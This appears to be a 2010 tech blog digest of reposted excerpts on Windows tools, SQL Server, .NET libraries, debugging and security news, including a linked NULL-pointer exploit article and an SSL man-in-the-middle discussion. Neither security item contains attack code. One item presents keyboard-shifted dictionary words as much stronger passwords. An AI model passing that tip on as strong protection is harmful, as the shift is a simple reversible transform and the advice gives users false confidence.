Visual Studio 2010 Theme for Windows 7
Visual Studio 2010 Theme for Windows 7 is available on Rob’s SkyDrive and can be downloaded from here. This theme will only work on Windows 7. For more wallpapers and themes, make sure you visit our Windows 7 Wallpapers and Windows 7 Themes Gallery. Read more: Redmond Pie
Stream Media from Windows 7 to XP with VLC Media Player
Posted by jasper22 at 14:33
So you’ve got yourself a new computer with Windows 7 and you’re itching to take advantage of its ability to stream media across your home network. But the rest of the family is still on Windows XP and you’re not quite ready to shell out the cash for the upgrades. Well, today we’ll show you how to easily stream media from Windows 7 to Windows XP with VLC Media Player. On the host computer running Windows 7, you’ll need to have an account set up with both a username and password; a blank password will not work. The media files will need to be located in a shared folder. Note: If the media files are located within the Public directory, or within the profile of the user account you use to log into the Windows 7 computer, they will be shared automatically.
Sharing your Media Folders
On your Windows 7 computer, right-click on the folder containing the files you’d like to stream and choose Properties. Read more: How-to-geek
Shift Your Fingers One Key to the Right for Easy-to-Remember but Awesome Passwords
Posted by jasper22 at 14:16
You're constantly told how easy it would be to hack your weak passwords, but complicated passwords just aren't something our brains get excited about memorizing. Reader calculusrunner offers a brilliant tip that turns weak passwords into something much, much better. His clever solution: stick with your weak, dictionary password if you must; just move your fingers over a space on the keyboard. If you want a secure password without having to remember anything complex, try shifting your fingers one set of keys to the right. It will make your password look like gibberish, will often add in punctuation marks, and is quick and simple. When John Pozadzides showed us how he'd hack our weak passwords, he listed the top 10 passwords he'd try first. Let's take a look at how a few of those popular passwords fare when run through calculusrunner's method:
* password => [sddeptf
* letmein => ;ry,rom
* money => .pmru
* love => ;pbr
Something longer but still really lame, like, say, "topsecretpassword", becomes "yp[drvtry[sddeptf". These may not be perfect compared to secure password generators, but they're likely orders of magnitude better than a lot of people's go-to passwords. Read more: Lifehacker
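For the curious, here's a minimal C# sketch of the trick (my own illustration, not from the article): it maps each character to its right-hand neighbour on a standard US QWERTY row and leaves anything it doesn't recognize alone.

using System;
using System.Collections.Generic;

class ShiftRight
{
    // Each string is one QWERTY row; every character maps to the key immediately to its right.
    static readonly string[] Rows = { "`1234567890-=", "qwertyuiop[]\\", "asdfghjkl;'", "zxcvbnm,./" };

    static string Shift(string password)
    {
        var map = new Dictionary<char, char>();
        foreach (var row in Rows)
            for (int i = 0; i < row.Length - 1; i++)
                map[row[i]] = row[i + 1];

        var shifted = new char[password.Length];
        for (int i = 0; i < password.Length; i++)
            shifted[i] = map.TryGetValue(char.ToLowerInvariant(password[i]), out var right) ? right : password[i];
        return new string(shifted);
    }

    static void Main()
    {
        Console.WriteLine(Shift("password"));          // [sddeptf
        Console.WriteLine(Shift("topsecretpassword")); // yp[drvtry[sddeptf
    }
}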
Is OS/2 Coming Back?
Posted by jasper22 at 11:30
Is IBM considering relaunching OS/2? One source close to IBM says Big Blue plans to repurpose OS/2 services atop a Linux core. IT managers ask: why now? Hey, back in simpler times OS/2 was super badass. Both of the guys who ran it were hard core. Read more: Slashdot
TeamViewer goes cross-platform, now available for download on Linux
Posted by jasper22 at 11:24
Well, I can now cross yet another application off my list of apps I'd miss if I switched to Linux. TeamViewer, my remote support application of choice, has arrived -- bringing its zero-config screen sharing goodness to Linux. Some of the more recent additions -- like per-application screen sharing via TeamViewer's toolbar button -- haven't made it into the Linux version yet, but things administrators need most are there. Remote (both hosting and control), file transfer, chat (both text and voice), and session recording all work nicely. Partner Lists are also available on Linux, making remote connections to your saved hosts a cinch. Right now, TeamViewer for Linux is beta software. Like other TV betas I've tested on Windows and Mac, however, the Linux version is very usable and every bit as solid as most of the stable release software I run. Read more: DownloadSquad
How To Exploit NULL Pointers
Ever wondered what was so bad about NULL pointer exceptions? An MIT Linux kernel programmer explains how to turn any NULL pointer into a root exploit on Linux. (There was also a previous installment about virtual memory and how to make NULL pointers benign.) Read more: Slashdot
Read more: How to turn any NULL pointer into a root exploit on Linux
Understanding RAID for SQL Server: Part 1
Posted by jasper22 at 11:31
Choosing the right number of hard drives and the correct RAID (redundant array of independent disks) configuration when you design your database server can save you a lot of time. If you make a mistake, changing the RAID configuration and moving the database to correct any problems on a deployed server will cause long downtimes and consume IT resources. In fact, we have known people who have purchased new servers in order to mitigate the downtime of deploying a new disk subsystem.
We Are Just Getting Started
File subsystems for SQL Server is really a "which came first, the chicken or the egg" topic—do we tell you about RAID before we talk about hard drive configuration? Do we talk about the number of physical disks before we explain how the database files are accessed on the disk? Or, should we describe how to reconfigure an old server or how to purchase the best configuration? We need to start somewhere, and we decided to start with RAID. But stay tuned, this is the beginning of a series of blog posts about SQL Server disk subsystems and RAID. Sign up for the RSS feed so you are notified when our next posts are published.
Software RAID
There are two types of RAID available to the SQL Server administrator: hardware RAID and software RAID. Software RAID is a fancy way of saying Windows RAID, because the only software RAID available is the one that comes with Windows Server 2003 and Windows Server 2008. When should you use Windows RAID with SQL Server? The answer is never. Windows RAID is implemented at the file system level (not the disk subsystem level) and involves diverting CPU resources from the server into managing the RAID. With SQL Server, you need to retain this CPU horsepower to handle the queries against the database. Plus, modern servers come with RAID built into the motherboard, or they have inexpensive add-on RAID options. Because of the low price (or no price), there is no financial benefit from not using the better-performing hardware RAID. So why do we mention it? Just in case you were thinking about using it.
Hardware RAID
RAID is the simulation of a single disk over more than one physical disk drive. This simulation can be done in a variety of different ways, called levels. Each level has advantages and drawbacks—let's discuss each as it relates to SQL Server.
RAID level 0
SQL Server 2008 Books Online says "This level [0] is also known as disk striping. . . . Data is divided into blocks and spread in a fixed order among all disks in an array. RAID 0 improves read and write performance by spreading operations across multiple disks" ("RAID Levels and SQL Server," SQL Server 2008 Books Online, MSDN). Another way to think about RAID level 0 is that a single write happens on only one disk, and reads can be done asynchronously across all the physical disk heads in the array. Read more: Siemens Teamcenter on SQL Server
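To make the "a single write happens on only one disk" point concrete, here is a small C# sketch (my own illustration, not from the article; the stripe unit is one block and the disk count is an arbitrary example) showing how round-robin striping maps a logical block to a single member disk:

using System;

class Raid0Mapping
{
    // For block-level round-robin striping, a logical block lands on exactly one disk,
    // at a per-disk offset equal to the stripe index.
    static (int Disk, long Offset) Locate(long logicalBlock, int diskCount)
    {
        return ((int)(logicalBlock % diskCount), logicalBlock / diskCount);
    }

    static void Main()
    {
        const int disks = 4;
        for (long block = 0; block < 8; block++)
        {
            var (disk, offset) = Locate(block, disks);
            Console.WriteLine($"logical block {block} -> disk {disk}, offset {offset}");
        }
        // Each individual write touches one disk; a sequential read of blocks 0..7 fans out across all four.
    }
}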
Microsoft Partner Network Technical Services Gadget
Posted by jasper22 at 11:30
This gadget is designed for Microsoft Partners to access online technical services more conveniently. Users can directly visit the queues specific for Microsoft Partners through the gadget on the desktop. Read more: MS Download
Combres 2.0 - A Library for ASP.NET Website Optimization
Posted by jasper22 at 11:30
A few months ago, I released the beta version of Combres 1.0, a .NET library that automates the application of many web performance optimization techniques for ASP.NET applications. I also wrote an article about that release to demonstrate the features of the library. Since that article was published, there have been a couple of minor releases, until last week when a major release, version 2.0, came out. There are so many changes in version 2.0 that it wouldn't make sense to update the old article, so I decided to write this article to introduce readers to Combres 2.0. This is meant to be a self-contained article, so you don't need to refer to the old article to understand Combres.
Combres in a Nutshell
The development of Combres was inspired by the simple, yet highly effective, website optimization techniques described in a book by Steve Souders and the documentation of the Firefox add-on YSlow. Specifically, Combres automates the application of the following website optimization techniques in your ASP.NET MVC or ASP.NET Web Forms applications while requiring you to do very little work.
* Make fewer HTTP requests. Using Combres, you describe your website's resources, including JavaScript and CSS files, in an XML config file and group them into different resource sets. Combres will combine resources in the same resource set and make the combined content available in a single HTTP request.
* Add Expires or Cache-Control header. Combres automatically emits Expires and Cache-Control response headers in responding to the HTTP request for each resource set based on the caching information you specify in the XML config file. In addition, Combres caches the combined content on the server so that the combination process, among other steps described below, won't be executed for every new user (or when an existing user's browser cache is invalidated).
* Gzip components. Combres will detect Gzip and/or Deflate support in the users' browser and apply the appropriate compression algorithm on each resource set's combined content before sending it to the browser. If the browser doesn't support compression, Combres will return the raw output instead.
* Minify JavaScript. Combres can minify the contents of both JavaScript and CSS resources. For JavaScript resources, you can configure Combres to choose among the following minification engines: YUI Compressor for .NET, Microsoft Ajax Minifier and Google Closure Compiler. For each of these engines, Combres allows you to configure all specific attributes so that you can maximize its effectiveness. Each resource set is usually assigned a specific minification engine, although if you need to, you can have resources within the same resource set minified using separate engines.
* Configure ETags. Combres emits ETags for each resource set's combined content. When the browser sends back an ETag, Combres checks whether that ETag identifies the latest version of the resource set; if not, it pushes the new content to the browser; otherwise, it returns a Not Modified (304) response status. In short, Combres helps combine, minify, compress, cache, and append appropriate headers to the JavaScript and CSS resources in your application. All you need to do is create an XML config file describing what you want Combres to do and add a few lines of code to register and use Combres in your applications. In this article, we'll explore these core features as well as more advanced features of Combres. Read more: Codeproject
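To get a feel for what a combining/compressing handler does under the hood, here is a deliberately simplified ASP.NET sketch. It is not Combres' actual API — the handler name, file list and cache duration are all assumptions — but it shows the combine, gzip and cache-header steps the article describes.

using System;
using System.IO;
using System.IO.Compression;
using System.Web;

// Hypothetical combiner: one request returns the concatenated, compressed, cacheable content.
public class CombinedResourceHandler : IHttpHandler
{
    // Assumed file list; Combres itself reads resource sets from its XML config instead.
    private static readonly string[] Files = { "~/Scripts/a.js", "~/Scripts/b.js" };

    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        var response = context.Response;
        response.ContentType = "application/javascript";

        // "Add Expires or Cache-Control header"
        response.Cache.SetCacheability(HttpCacheability.Public);
        response.Cache.SetExpires(DateTime.UtcNow.AddDays(365));

        // "Gzip components": compress only if the browser advertises support
        var acceptEncoding = context.Request.Headers["Accept-Encoding"] ?? "";
        if (acceptEncoding.Contains("gzip"))
        {
            response.Filter = new GZipStream(response.Filter, CompressionMode.Compress);
            response.AppendHeader("Content-Encoding", "gzip");
        }

        // "Make fewer HTTP requests": concatenate every file into this single response
        foreach (var file in Files)
            response.Write(File.ReadAllText(context.Server.MapPath(file)) + "\n");
    }
}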
VisualHG
Posted by jasper22 at 11:30
Mercurial Source Control Plugin for MS Visual Studio
* VisualHG indicates file status within the project files tree of MSVC
* Tracks adding, moving and renaming of files
* Gives you dialogs for committing changes, viewing detailed file status and history, and much more, using TortoiseHG as its backend
* Everything directly from your workspace via context menu and a toolbar
* Compatible with MSVS 2005, MSVS 2008 and also MSVS 2010 RC
* Support for Mercurial subrepositories
* Recognizes projects under version control that are not in the same folder as the solution
* File status icons for renamed files
* File-state tooltips
Read more: Codeplex
SOSEX - A New Debugging Extension for Managed Code
Posted by jasper22 at 11:20
Over the course of the last few months, I've really put lots of effort into understanding and utilizing WinDbg. As a primarily C# developer, this meant also becoming intimately familiar with the SOS extension. Though a bit tedious, this exercise has already paid rich dividends in my debugging experience. As powerful and handy as SOS is, however, it has some annoying limitations and quirks. My personal peeves with SOS, combined with my desire to learn to write a WinDbg extension, led me to develop SOSEX, a debugging extension for managed code that begins to alleviate some of my frustrations with SOS. SOSEX (available in x86 and x64 versions) provides 8 easy-to-use commands: !dumpgen (dumps the contents of a GC generation), !gcgen (indicates the GC generation of a given object), !refs (lists all references to and from the specified object), !bpsc (breakpoint, source code), !bpmo (breakpoint, method offset), !vars (dump all args and local variables), !isf (inspect static field) and !dlk (deadlock detection). The rest of this post will provide a bit more detail about each command and how they can save you time. Use the !help command for a list of commands and !help <command name> for the syntax and usage of each command.
!dumpgen and !gcgen
With SOS, you can dump the contents of the heap like so:
0:000> !dumpheap -short
00000642787c7370
00000642787c7388
00000642787c73b0
00000642787c7410
00000642787c7440
00000642787c7498
00000642787c74f0
...
The problem with this is that there is no easy way to tell from the output which generation each object belongs to. You can follow up the call to !dumpheap with !eeheap -gc, which will provide the necessary information to determine generations. However, determining the contents of, say, generation 2 using this method is very tedious. Here's the output of !eeheap -gc for a dual-processor system in server GC mode:
0:000> !eeheap -gc
Number of GC Heaps: 2
------------------------------
Heap 0 (0000000002264180)
generation 0 starts at 0x000000007fff0098
generation 1 starts at 0x000000007fff0080
generation 2 starts at 0x000000007fff0068
ephemeral segment allocation context: none
segment begin allocated size
0000000002271b80 00000642787c7370 0000064278809088 0x0000000000041d18(269592)
000000007fff0000 000000007fff0068 0000000080002fe8 0x0000000000012f80(77696)
Large object heap starts at 0x00000000ffff0068
segment begin allocated size
00000000ffff0000 00000000ffff0068 00000000ffff80c8 0x0000000000008060(32864)
Heap Size 0x5ccf8(380152)
------------------------------
Heap 1 (0000000002264e00)
generation 0 starts at 0x00000000bfff0098
generation 1 starts at 0x00000000bfff0080
generation 2 starts at 0x00000000bfff0068
ephemeral segment allocation context: none
segment begin allocated size
00000000bfff0000 00000000bfff0068 00000000bfff00b0 0x0000000000000048(72)
Large object heap starts at 0x000000010fff0068
segment begin allocated size
000000010fff0000 000000010fff0068 000000010fff0080 0x0000000000000018(24)
Heap Size 0x60(96)
------------------------------
GC Heap Size 0x5cd58(380248)
As you can see, you have a lot of work to do in order to pick through the output of !dumpheap and compare object addresses to the segment addresses provided by !eeheap -gc. Enter SOSEX's !dumpgen command. Read more: Steve's Techspot, SOSEX v4.0 Now Available
Man-in-the-Middle Attacks Against SSL
Posted by jasper22 at 11:13
Says Matt Blaze: A decade ago, I observed that commercial certificate authorities protect you from anyone from whom they are unwilling to take money. That turns out to be wrong; they don't even do that much.
Scary research by Christopher Soghoian and Sid Stamm: Abstract: This paper introduces a new attack, the compelled certificate creation attack, in which government agencies compel a certificate authority to issue false SSL certificates that are then used by intelligence agencies to covertly intercept and hijack individuals' secure Web-based communications. We reveal alarming evidence that suggests that this attack is in active use. Finally, we introduce a lightweight browser add-on that detects and thwarts such attacks.
Even more scary, Soghoian and Stamm found that hardware to perform this attack is being produced and sold: At a recent wiretapping convention, however, security researcher Chris Soghoian discovered that a small company was marketing internet spying boxes to the feds. The boxes were designed to intercept those communications -- without breaking the encryption -- by using forged security certificates, instead of the real ones that websites use to verify secure connections. To use the appliance, the government would need to acquire a forged certificate from any one of more than 100 trusted Certificate Authorities. [...] The company in question is known as Packet Forensics.... According to the flyer: "Users have the ability to import a copy of any legitimate key they obtain (potentially by court order) or they can generate 'look-alike' keys designed to give the subject a false sense of confidence in its authenticity." The product is recommended to government investigators, saying "IP communication dictates the need to examine encrypted traffic at will." And, "Your investigative staff will collect its best evidence while users are lulled into a false sense of security afforded by web, e-mail or VOIP encryption."
Matt Blaze has the best analysis. Read his whole commentary; this is just the ending: It's worth pointing out that, from the perspective of a law enforcement or intelligence agency, this sort of surveillance is far from ideal. A central requirement for most government wiretapping (mandated, for example, in the CALEA standards for telephone interception) is that surveillance be undetectable. But issuing a bogus web certificate carries with it the risk of detection by the target, either in real-time or after the fact, especially if it's for a web site already visited. Although current browsers don't ordinarily detect unusual or suspiciously changed certificates, there's no fundamental reason they couldn't (and the Soghoian/Stamm paper proposes a Firefox plugin to do just that). In any case, there's no reliable way for the wiretapper to know in advance whether the target will be alerted by a browser that scrutinizes new certificates. Read more: Bruce Schneier
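The point about clients noticing a suspiciously changed certificate is easy to illustrate in .NET. Below is a minimal C# sketch — the pinned thumbprint and URL are placeholders — that rejects any certificate whose thumbprint differs from one recorded earlier, even if it chains to a trusted CA:

using System;
using System.Net;
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;

class PinnedCertificateCheck
{
    // Placeholder: the thumbprint you previously recorded for the site.
    const string ExpectedThumbprint = "0123456789ABCDEF0123456789ABCDEF01234567";

    static void Main()
    {
        ServicePointManager.ServerCertificateValidationCallback =
            (object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors errors) =>
            {
                bool matches = string.Equals(cert.GetCertHashString(), ExpectedThumbprint,
                                             StringComparison.OrdinalIgnoreCase);
                if (!matches)
                    Console.WriteLine("Certificate changed - possible interception.");
                // Require both the pinned thumbprint and a clean validation result.
                return matches && errors == SslPolicyErrors.None;
            };

        using (var client = new WebClient())
        {
            try { client.DownloadString("https://example.com/"); }
            catch (WebException ex) { Console.WriteLine("Request blocked: " + ex.Message); }
        }
    }
}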
25 Startups That Will Be Shaping The Next Web
Posted by jasper22 at 11:12
April promises to be quite the busy month for European startups that are preparing to launch on stage. As Mike Butcher wrote earlier today, GeeknRolla will be rocking London on April 20, with a host of great speakers and fledgling tech companies dying to show off their stuff. A week after that, I’ll be attending the fifth edition of The Next Web conference, an annual event held in Amsterdam, The Netherlands. At the latter event, 25 startups will be pitching to a live audience of over 1,000 attendees: venture capitalists, press and early adopters will once again be out in full force for the occasion. Keep reading if you’re interested in attending as well. The organizers of The Next Web 2010 say they have reviewed 245 submissions, looked at 73 one-minute video pitches and ultimately selected 45 companies for a back-to-back interview round. In the end, 25 startups made the cut – they will get the chance to talk up their company on the main stage, after which a jury of professionals (myself included) will jointly decide who delivered the most convincing pitch. All finalists will launch a new service or announce a major update at the conference. The audience gets to decide on two startups from the Startup Arena, but the 23 that have been pre-selected are:
Tribe of Noise – “A worldwide community connecting musicians & companies”
Inbox2 – “One stream for all your accounts”
Fashiolista – “Discover, shop and share your style”
MailSuite (stealth)
Pipio – “The Easiest Way to Start, Organize,and Discover Conversations”
Distimo – “App store analytics”
Twittercounter – Twitter-powered public statistics provider
Ecwid – “A new breed of shopping cart software”
DoubleDutch – “The only white label, location-based iPhone app”
English Attack! – “The first 100% entertainment-based method of learning English”
Fits.me – “Virtual Fitting Room for Online Clothing Retailers”
NextWidgets – “Your online shop miniaturized to the size of a banner ad”
Feest.je (stealth)
22tracks – “New music, the easy way”
(more...) Read more: TechCrunch
PowerPack for VHD/VDI/VMDK Inventory
Posted by jasper22 at 11:12
If you, like me, have a bunch of virtual machines on your laptop, you are going to love the Virtual Disk Inventory PowerPack which Kenneth Bell has just posted. The pack quickly gives you a list of the VHD, VDI, and VMDK files you have on the computer, and for each machine provides the computer name and operating system. Read more: Dmitry’s PowerBlog: PowerShell and beyond
Mono.Cecil 0.9 "cecil/light"
Posted by jasper22 at 11:07
I started working on Mono.Cecil during the fall of 2004. In its current incarnation, it has served me and a lot of people very well. But looking at it now, it has aged quite a bit. The code still compiles on .net 1.1, is using old conventions, doesn’t have a real test suite, is quite memory hungry, and is not that optimized. None of which prevents it from being a useful and widely used library, but looking back, I could have done a lot of things differently. And doing things differently is basically what I’ve been doing for the past two years in my free time. What originally started as a refactoring of Mono.Cecil for the decompiler ended up as a rewrite from the ground up. And today I’m excited to make public what is the next version of Cecil, which I’ve been fondly calling “cecil/light”. Let’s start with a warning: this version contains breaking changes from the previous API. I didn’t promise API stability for the previous code, but this iteration of Mono.Cecil, tagged 0.9, is a huge step towards 1.0 and API stability. But let’s focus for a while on the bright and new side. Mono.Cecil 0.9 comes with:
* A cleaned and genericized API; I took this opportunity to clean some parts I hated in the old API.
* A smaller and easier to maintain C#3 code base (Mono.Cecil 0.9 compiled with optimizations by csc is about 250k against almost 400k for 0.6) which only requires a .net 2.0 compatible runtime.
* A test suite which is very easy to augment.
* Better support for pdb and mdb files and strong name assemblies.
* Complete support for PE32+ assemblies.
* Bug fixes that weren’t possible without large changes in the old code.
* Less memory consumption.
* Lazy loading of every metadata element.
* Speed and optimizations.
* Complete Silverlight support.
* A beginning of documentation on a wiki.
* A collection of extension methods to add features to Cecil when they’re not necessary to the core assembly. I ported a few of my projects to this version of Cecil already, and it shows great results. I didn’t spend more than four hours per project to adjust the code in a branch. There’s a migration page on the wiki to help you. If it doesn’t answer your question, reach us on the mono-cecil group. Read more: Jb in nutshell, Mono.Cecil
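To give a flavour of the library, here is a short C# sketch that walks an assembly's types and methods; it assumes the AssemblyDefinition.ReadAssembly entry point of the 0.9 API, and the assembly path is a placeholder.

using System;
using Mono.Cecil;

class CecilDump
{
    static void Main()
    {
        // Placeholder path; any managed assembly will do.
        AssemblyDefinition assembly = AssemblyDefinition.ReadAssembly("SomeLibrary.dll");

        // Metadata elements are loaded lazily, so only what we touch gets resolved.
        foreach (TypeDefinition type in assembly.MainModule.Types)
        {
            Console.WriteLine(type.FullName);
            foreach (MethodDefinition method in type.Methods)
                Console.WriteLine("  " + method.Name);
        }
    }
}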
Using Windows 7 libraries in .NET
Posted by jasper22 at 11:05
With the release of Windows 7, a new feature was introduced – libraries. A library is basically a content placeholder for any files or folders. Being a virtual entity, a user doesn’t copy a folder or file to a library, but rather adds a reference to it. This makes it possible for a file or folder to be a member of multiple libraries. For example, a user has a file called reports.txt and two libraries – Reports and ToSend. Later on, he adds a reference to reports.txt to both Reports and ToSend. The file remains in its original location, while both libraries contain the reference. This makes file organization and tracking a lot easier. Read more: Dzone
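As a rough sketch of what this looks like from .NET code — assuming the Windows API Code Pack's ShellLibrary wrapper, with example library and folder names — adding a folder reference to an existing library might look like this:

using Microsoft.WindowsAPICodePack.Shell;

class LibraryExample
{
    static void Main()
    {
        // Open the existing "Reports" library for writing and add a folder reference to it.
        // The folder itself stays where it is; the library only stores a pointer to it.
        using (ShellLibrary library = ShellLibrary.Load("Reports", false))
        {
            library.Add(@"C:\Work\MonthlyReports");
        }
    }
}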
Adobe Launches Photoshop CS5 and Photoshop CS5 Extended
Posted by jasper22 at 11:03
Milestone Release Celebrates 20 Years of Unrivaled Image Editing and Innovation
SAN JOSE, Calif. — April 12, 2010 — Adobe Systems Incorporated (Nasdaq:ADBE) today announced Adobe® Photoshop® CS5 and Photoshop CS5 Extended software, must-have releases of the professional industry standard for digital imaging. With millions of users celebrating the product’s 20th anniversary this year, Photoshop CS5 builds upon a rich history of innovation and leadership with groundbreaking features and performance gains that boost creativity and workflow efficiency. Packing in more technological advancements from Adobe Labs than any other release and incorporating enhancements to everyday tasks requested by the Photoshop community, the software has greater intelligence and awareness of the content within images, allowing for complex and magical manipulation in just a few clicks. Adobe Photoshop CS5 Extended delivers everything in Photoshop CS5, as well as advanced tools for 3-D which address the unique needs of the video, Web, medical, manufacturing and engineering industries. Photoshop CS5 and Photoshop CS5 Extended will be available as stand-alone applications or key components of the Adobe Creative Suite® 5 family (see separate releases).
“The past two decades have demonstrated an amazing interplay between customers who want to push the limits of their personal creativity and a passionate team of Adobe engineers who make those visions a reality,” said Kevin Connor, vice president of product management for professional digital imaging at Adobe. “We experienced this firsthand when we posted a ‘sneak peek’ video of the team’s work on the Content Aware Fill feature a few weeks ago. It quickly became the number one viral video online, with close to 2 million views and its ‘magic’ was one of the top trending Twitter topics of discussion. This version of Photoshop has some of the most innovative and extraordinary technologies to ever come from our labs and clearly customers are already clamoring for it.” Read more: PhotoshopNews.com
A SQL Server DBA myth a day: (12/30) tempdb should always have one data file per processor core
Posted by jasper22 at 11:02
Myth #12: tempdb should always have one data file per processor core. FALSE.
Sigh. This is one of the most frustrating myths, because there's so much 'official' information from Microsoft, and other blog posts, that perpetuates this myth. There's only one tempdb per instance, and lots of things use it, so it's often a performance bottleneck. You guys know that already. But when does a performance problem merit creating extra tempdb data files? When you see PAGELATCH waits on tempdb, you've got contention for in-memory allocation bitmaps. When you see PAGEIOLATCH waits on tempdb, you've got contention at the I/O subsystem level. You can think of a latch as kind of like a traditional lock, but much lighter weight, much more transitory, and used by the Storage Engine internally to control access to internal structures (like in-memory copies of database pages). Fellow MVP Glenn Berry (twitter|blog) has a blog post with some neat scripts using the sys.dm_os_wait_stats DMV - the first one will show you what kind of wait is most prevalent on your server. If you see that it's PAGELATCH waits, you can use this script from newly-minted MCM and Microsoft DBA Robert Davis (twitter|blog). It uses the sys.dm_os_waiting_tasks DMV to break apart the wait resource and let you know what's being waited on in tempdb. If you're seeing PAGELATCH waits on tempdb, then you can mitigate it using trace flag 1118 (fully documented in KB 328551) and creating extra tempdb data files. I wrote a long blog post debunking some myths around this trace flag and why it's still potentially required in SQL 2005 and 2008 - see Misconceptions around TF 1118. On SQL Server 2000, the recommendation was one tempdb data file for each processor core. On 2005 and 2008, that recommendation persists, but because of some optimizations (see my blog post) you may not need one-to-one - you may be ok with the number of tempdb data files equal to 1/4 to 1/2 the number of processor cores. Now this is all one big-ass generalization. I heard just last week of a customer whose tempdb workload was so high that they had to use 64 tempdb data files on a system with 32 processor cores - and that was the only way for them to alleviate contention. Does this mean it's a best practice? Absolutely not! So, why is one-to-one not always a good idea? Too many tempdb data files can cause performance problems for another reason. If you have a workload that uses query plan operators that require lots of memory (e.g. sorts), the odds are that there won't be enough memory on the server to accommodate the operation, and it will spill out to tempdb. If there are too many tempdb data files, then the writing out of the temporarily-spilled data can be really slowed down while the allocation system does round-robin allocation. Read more: In recovery, DBA myth a day list
Debugging Hibernate Generated SQL
Posted by jasper22 at 10:56
In this article, I will explain how to debug Hibernate’s generated SQL so that unexpected query results can be traced faster to either a faulty dataset or a bug in the query. There’s no need to present Hibernate anymore. Yet, for those who lived in a cave for the past years, let’s say that Hibernate is one of the two main ORM frameworks (the second one being TopLink) that dramatically ease database access in Java. One of Hibernate’s main goals is to lessen the amount of SQL you write, to the point that in many cases, you won’t even write one line. However, chances are that one day, Hibernate’s fetching mechanism won’t get you the result you expected and the problems will begin in earnest. From that point, and before further investigation, you should determine which is true:
* either the initial dataset is wrong
* or the generated query is
* or both, if you’re really unlucky
Being able to quickly diagnose the real cause will save you much time. In order to do this, the biggest step is viewing the generated SQL: if you can execute it in the right query tool, you can then compare the pure SQL results to Hibernate’s results and determine the true cause. There are two solutions for viewing the SQL.
Show SQL
The first solution is the simplest one. It is part of Hibernate’s configuration and is heavily documented. Just add the following line to your hibernate.cfg.xml file:
<hibernate-configuration>
<session-factory>
...
<property name="hibernate.show_sql">true</property>
</session-factory>
</hibernate-configuration>
Read more: DZone
Routing a localized ASP.NET MVC application
Posted by jasper22 at 10:54
Localizing a general ASP.NET application is easy to implement. All we have to do is assign a specific culture to Thread.CurrentThread.CurrentUICulture and use resources to display the localized text. There are two common ways to do this task:
Manually change CurrentUICulture in the Application.BeginRequest event
The implementation will look something like this:
protected void Application_BeginRequest(object sender, EventArgs e)
{
var cultureName = HttpContext.Current.Request.UserLanguages[0];
Thread.CurrentThread.CurrentUICulture = new CultureInfo(cultureName);
}
Let ASP.NET set the UI culture automatically based on the values that are sent by the browser
We get this by changing web.config. The configuration will look like this:
<system.web>
<globalization enableClientBasedCulture="true" uiCulture="auto:en"/>
</system.web>
The problem is that the culture info is stored in UserLanguages, which is defined by the browser. If a user wants to change to another language, he must go to "Internet Options" (in IE, for example) to change the Language Preference. This technique is also a problem for search engines, because a search engine cannot classify the two different language versions, so our page rank won't be promoted. Generally, we solve this problem by using the URL to define the culture (we will call this a localized URL). So, a URL changes from http://domain/action/ to http://domain/[culture-code]/action (for example: http://domain/vi-VN/action). Then, in the Application.BeginRequest event, we can change the UI culture like this:
protected void Application_BeginRequest(object sender, EventArgs e)
{
var cultureName = HttpContext.Current.Request.RawUrl.Substring(1, 5); // RawUrl is "/vi-VN/action", so this extracts "vi-VN"
Thread.CurrentThread.CurrentUICulture = new CultureInfo(cultureName);
}
Everything seems to be OK until the birth of ASP.NET MVC. The routing technique used by the ASP.NET MVC framework causes a problem for this localization approach, because the routing engine needs to parse the URL to create the right controller. Appending a prefix to the real URL gives the routing engine the wrong result. So, we need a way to combine ASP.NET MVC routing with localized URLs. Read more: Codeproject
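One common way to make the two play together — a sketch, not the article's full solution — is to put the culture code into the route pattern itself, so the routing engine treats it as an ordinary route value (the route name, defaults and constraint below are examples):

using System.Web.Mvc;
using System.Web.Routing;

public static class LocalizedRoutes
{
    public static void RegisterRoutes(RouteCollection routes)
    {
        // e.g. http://domain/vi-VN/Home/Index — "culture" becomes a normal route value
        routes.MapRoute(
            "Localized",
            "{culture}/{controller}/{action}/{id}",
            new { culture = "en-US", controller = "Home", action = "Index", id = UrlParameter.Optional },
            new { culture = @"[a-z]{2}-[A-Z]{2}" });
    }
}

A base controller or action filter can then read the culture route value and assign it to Thread.CurrentThread.CurrentUICulture before the action runs.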
Oxygene: Obscure Programming Language of the Month
Posted by jasper22 at 10:53
What is Oxygene?
Oxygene is a commercial programming language developed by RemObjects Software for the Microsoft .NET Framework. In 2008, RemObjects licensed its Oxygene compiler and IDE technology to Embarcadero to be used in its Delphi Prism product. You may recall that in 2008 Embarcadero purchased CodeGear, the software development tools division of Borland.
Oxygene Design
The Oxygene programming language originated from Delphi and Object Pascal, but was designed to reflect the .NET programming paradigm and produce CLR-compliant assemblies. Thus, Oxygene does not support all the language features from Object Pascal and Delphi, but it does leverage all the features and technologies provided by the .NET runtime. New language features in Oxygene 3.0 include support for parallel programming, property notifications for the Model/View/Controller design pattern, nullable expressions, and improved QA analysis tools.
Oxygene History
RemObjects software came from a Delphi background. In 2002, RemObjects sought to expand its developer libraries into the Microsoft .NET Framework, so naturally they considered Delphi for .NET for the job. According to the RemObjects Chief Architect, it seemed like “Borland had developed Delphi for .NET with one main goal in mind: to hide the transition from Win32 to .NET from the developers.” As a result, Delphi for .NET “introduced many Delphi-isms and Win32-isms that felt out of place and awkward in the .NET world.” (source) As a result, RemObjects chose to use C# for its .NET projects instead of Delphi. But its engineers really missed the Pascal syntax, so eventually RemObjects decided to invent a language for .NET with the Pascal syntax, and Oxygene was born. Its code name was Adrenochrome, which was later shortened to Chrome, and eventually renamed to Oxygene.
“Hello World” in Oxygene
implementation

class method ConsoleApp.Main;
begin
  // add your own code here
  Console.WriteLine('Hello World.');
end;

end.
Read more: DevTopics
Cool Office Tools Now Available
Posted by jasper22 at 10:39
Today we released two new tools to help users transition from Office 2003 to Office 2010. These new Silverlight based tools for Word and Excel can be found at http://office2010.microsoft.com/en-us/training/learn-where-menu-and-toolbar-commands-are-in-office-2010-HA101794130.aspx#_Toc256784678 with more coming for the other Office apps soon. Office 2007 users can find similar tools at: http://office.microsoft.com/en-gb/training/HA102295841033.aspx
All a user needs to do is click the menu option in an Office 2003 like interface and it will show you where to find that in Office 2010. Pretty slick! Read more: ISV Developer Community
PreEmptive Solutions Runtime Intelligence API
Posted by jasper22 at 10:38
